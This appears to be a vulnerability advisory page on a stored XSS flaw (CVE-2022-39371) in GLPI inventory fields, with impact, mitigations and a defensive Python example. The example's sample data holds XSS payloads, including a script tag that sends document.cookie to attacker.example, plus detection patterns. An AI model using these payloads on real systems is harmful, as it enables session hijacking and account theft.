
CVE-2022-39371: CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in glpi-project glpi

Medium
Published: Thu Nov 03 2022 (11/03/2022, 00:00:00 UTC)
Source: CVE
Vendor/Project: glpi-project
Product: glpi

Description

GLPI stands for Gestionnaire Libre de Parc Informatique. GLPI is a Free Asset and IT Management Software package that provides ITIL Service Desk features, licenses tracking and software auditing. Script-related HTML tags in assets inventory information are not properly neutralized. This issue has been patched, please upgrade to version 10.0.4. There are currently no known workarounds.

AI-Powered Analysis

Last updated: 06/22/2025, 14:36:36 UTC

Technical Analysis

CVE-2022-39371 is a medium-severity vulnerability classified under CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page), i.e. a basic cross-site scripting (XSS) flaw. It affects GLPI, an open-source IT asset and service management tool used for ITIL service desk functions, license tracking and software auditing. Affected versions are GLPI 10.0.0 up to, but not including, 10.0.4, where the issue is fixed.

The defect is in how GLPI handles asset inventory information: values stored as part of an asset's inventory (such as the data reported for a computer and its installed software) are written into web pages without the script-related HTML in them being neutralized. Whatever an attacker places in those fields is therefore rendered as markup, and any script it carries executes in the browser of each user who views the affected asset page, in the security context of that user's GLPI session. This is a stored XSS: the payload persists in the inventory and fires every time the page is opened, not only against a user who clicks a crafted link.

Exploitation requires the ability to insert or modify asset inventory information. Whether that needs valid credentials depends on the deployment: a user with rights to edit asset data can do it directly, and where inventory submissions are accepted from agents or integrations, control of a reporting host or of the submission channel may be enough, so the precise precondition should be assessed against how a given instance receives inventory data. Once a payload is stored, the consequences are those of any XSS in an authenticated application: session hijacking where cookies are reachable from script, actions performed with the victim's privileges, page defacement, and redirection to attacker-controlled sites. No exploitation in the wild has been reported, and no workaround is known other than upgrading to 10.0.4 or later.

Potential Impact

For European organizations the impact can be significant where GLPI underpins IT asset management and service desk operations. A stored XSS on an asset page is most dangerous when the victim is an administrator or technician, since those are the users who routinely open asset records: script running in their session can read or alter inventory, ticket and license data, and with administrative privileges can change GLPI configuration or create accounts, which compromises the integrity of the asset inventory and exposes confidential information such as software licenses and audit data. Because GLPI is often integrated with other IT management and monitoring tools, tampered inventory data or a compromised administrative session can affect those systems as well. The flaw can also serve as a foothold for further attacks, for example by redirecting users to phishing pages, particularly where GLPI is reachable from the internet or is not segmented from the rest of the network. The absence of known exploits lowers the immediate risk, but an XSS that fires on a commonly viewed page and requires only the ability to submit inventory data calls for prompt remediation.

Mitigation Recommendations

The primary and effective mitigation is to upgrade GLPI to version 10.0.4 or later, where the vulnerability is patched; there is no vendor-supplied workaround, so this update should be prioritized in the patch cycle. Until it is applied, the following measures reduce exposure without removing the flaw:

- Review custom integrations and plugins that display asset inventory data and make sure they HTML-encode every inventory value at output (context-appropriate encoding, not just input filtering), so that they do not reproduce the same defect.
- Deploy a web application firewall with rules for common XSS payloads on the GLPI endpoints that accept inventory data; treat this as a temporary layer, since encoded or unusual payloads can evade signature matching.
- Restrict access to the GLPI interface and to inventory submission endpoints to trusted networks and hosts, and enforce strong authentication and role-based access control so that fewer principals can write inventory data.
- Audit stored inventory fields for script-related markup (script and iframe tags, inline event handlers, javascript: URLs) to detect attempted exploitation; a finding indicates an already-stored payload that should be removed and investigated.
- Brief users and administrators on the risk, and monitor GLPI and web server logs for unusual inventory submissions or unexpected requests originating from asset pages, to support early detection and response.
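The two points above that a practitioner most wants to see concretely are the CWE-80 failure itself (an inventory value written into HTML without neutralization, and the same value with output encoding) and the audit of stored inventory fields for script-related markup. The following Python is an added example written for this page; it is not GLPI's code (GLPI renders its pages in PHP/Twig) and does not use GLPI's real inventory schema. The nested `SAMPLE_INVENTORY` record, the field names in it, and the `render_cell`/`audit_inventory` helpers are all constructed for illustration, and the detection patterns are a heuristic for the tag and attribute classes named in the mitigation, not an exhaustive XSS filter. The intended takeaway is the first half: escaping at output is what neutralizes the payload, while the scan only tells you whether one has already been stored.

```python
"""Illustrate CWE-80 on inventory data and audit stored fields for script-related HTML.

Added example for this page; constructed data and helper names, not GLPI's own code.
"""
import html
import re

# Heuristic patterns for the script-related markup classes named in the mitigation.
# Each requires a '<', so a correctly HTML-encoded value can never match.
SCRIPT_TAG_RE = re.compile(
    r"<\s*/?\s*(script|iframe|object|embed|svg|math|base|meta|link|style)\b", re.I
)
EVENT_HANDLER_RE = re.compile(r"<[^>]*\bon[a-z]+\s*=", re.I)      # <img src=x onerror=...>
JS_URI_RE = re.compile(r"<[^>]*=\s*[\"']?\s*javascript\s*:", re.I)  # <a href=javascript:...>


def is_script_related(value: str) -> bool:
    """True if the string contains markup that can execute script when rendered raw."""
    return bool(
        SCRIPT_TAG_RE.search(value)
        or EVENT_HANDLER_RE.search(value)
        or JS_URI_RE.search(value)
    )


def render_cell_unsafe(value: str) -> str:
    """The CWE-80 defect: the stored value is interpolated into HTML as-is."""
    return f"<td>{value}</td>"


def render_cell(value: str) -> str:
    """The fix: HTML-encode at output so '<', '>', '&' and quotes lose their meaning."""
    return f"<td>{html.escape(value, quote=True)}</td>"


def walk(obj, path: str = ""):
    """Yield (path, string) for every string leaf in a nested dict/list structure."""
    if isinstance(obj, dict):
        for key, child in obj.items():
            yield from walk(child, f"{path}.{key}" if path else str(key))
    elif isinstance(obj, list):
        for index, child in enumerate(obj):
            yield from walk(child, f"{path}[{index}]")
    elif isinstance(obj, str):
        yield path, obj


def audit_inventory(inventory) -> list:
    """Return [(path, value)] for every field holding script-related markup."""
    return [(path, value) for path, value in walk(inventory) if is_script_related(value)]


# Constructed inventory record, loosely shaped like what an inventory agent reports.
# Two fields carry payloads; the others include '=' and 'on...' text that must not be flagged.
SAMPLE_INVENTORY = {
    "deviceid": "desk-042-2022-11-03-10-00-00",
    "hardware": {
        "name": "desk-042",
        "comment": "Owner: <img src=x onerror=alert(document.cookie)>",
    },
    "softwares": [
        {"name": "Microsoft Office 2019", "version": "16.0 (build=12345)"},
        {
            "name": "<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
            "version": "1.0",
        },
        {"name": "Agent Monitor", "version": "2.1", "comment": "onboarding=done"},
    ],
}


if __name__ == "__main__":
    for path, value in audit_inventory(SAMPLE_INVENTORY):
        print(f"{path}: {value!r}")
        print("  rendered unsafely :", render_cell_unsafe(value))
        print("  rendered encoded  :", render_cell(value))
```

Running the script flags `hardware.comment` and `softwares[1].name` and prints each in both renderings; the encoded form turns `<script>` into `&lt;script&gt;`, which browsers display as text rather than execute. The audit is useful on a database export or on inventory payloads captured at the submission endpoint, but it is a detection aid: the only fix is the upgrade, or output encoding in code you control.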


Technical Details

Data Version
5.1
Assigner Short Name
GitHub_M
Date Reserved
2022-09-02T00:00:00.000Z
Cisa Enriched
true

Threat ID: 682d9846c4522896dcbf499d

Added to database: 5/21/2025, 9:09:26 AM

Last enriched: 6/22/2025, 2:36:36 PM

Last updated: 8/14/2025, 1:15:12 PM
